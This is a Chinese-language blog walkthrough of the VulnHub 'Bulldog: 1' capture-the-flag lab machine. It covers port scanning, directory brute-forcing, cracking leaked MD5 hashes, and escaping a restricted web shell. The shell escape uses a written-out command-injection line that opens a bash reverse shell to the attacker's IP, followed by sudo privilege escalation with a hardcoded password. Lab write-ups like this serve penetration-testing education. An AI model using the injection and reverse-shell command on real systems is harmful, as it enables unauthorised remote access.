No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习

**

VulnHub-Bulldog: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/bulldog-1,211/
靶机难度:初级(CTF)
靶机发布日期:2017年8月28日
靶机描述:
Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don’t you find out?
This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!
Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That’s my only hint
Made by Nick Frichette (frichetten.com) Twitter: @frichette_n
I’d highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn’t have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.
作者:大余
时间:2020-02-06
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第1张图片
我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第2张图片
我们已经找到了此次CTF目标计算机IP地址:192.168.56.140
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第3张图片
nmap发现开放了23、80、8080端口…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第4张图片
法斗…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第5张图片
这是说解雇了所有技术人员,因为发现被入侵了…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第6张图片
dirb爆破发现了admin和devURL…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第7张图片
这是一个登陆页面…admin默认密码无法登录…
sql注入也不行…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第8张图片
意思是说APT利用了Web服务器中的一个漏洞…他们从新服务器中完全删除PHP…也不会使用PHPMyAdmin或任何其他流行的CMS系统…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第9张图片
点进去
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第10张图片
需要服务器验证才能使用…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第11张图片
在dev前端源码发现了MD5值…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第12张图片
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第13张图片
等等,发现了nick/bulldog sarah/bulldoglover等…这里账号已经前面就有了,邮箱地址前面就是账号…
两个账号都能登录…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第14张图片
这里我使用了nick/bulldog登录…无权编辑任何内容…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第15张图片
我返回webshell发现可以使用了…应该是登录了问题
ifconfig
ls
echo
pwd
cat
rm
这里给了六个命令,执行别的都不行…

二、提权

No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第16张图片
命令:ls &&echo "bash -i >& /dev/tcp/192.168.56.103/1234 0>&1" | bash
成功提shell,这里很多种玩的方法,任你们玩…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第17张图片
发现bulldogaadmin…可以提权…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第18张图片
命令:find / -user bulldogadmin 2>/dev/null
第一眼看到了customPermissionApp,比较显眼…看它
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第19张图片
使用exiftool没安装…使用了strings查看…
直接获得密码:SUPERultimatePASSWORDyouCANTget
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第20张图片
可以看到可以使用sudo…需要TTY…
No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习_第21张图片
python提到TTY之后,提示我可以直接提权了…
成功提到root权限,并查看flag…

比较简单的一台靶机…加油!

由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

你可能感兴趣的:(No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习)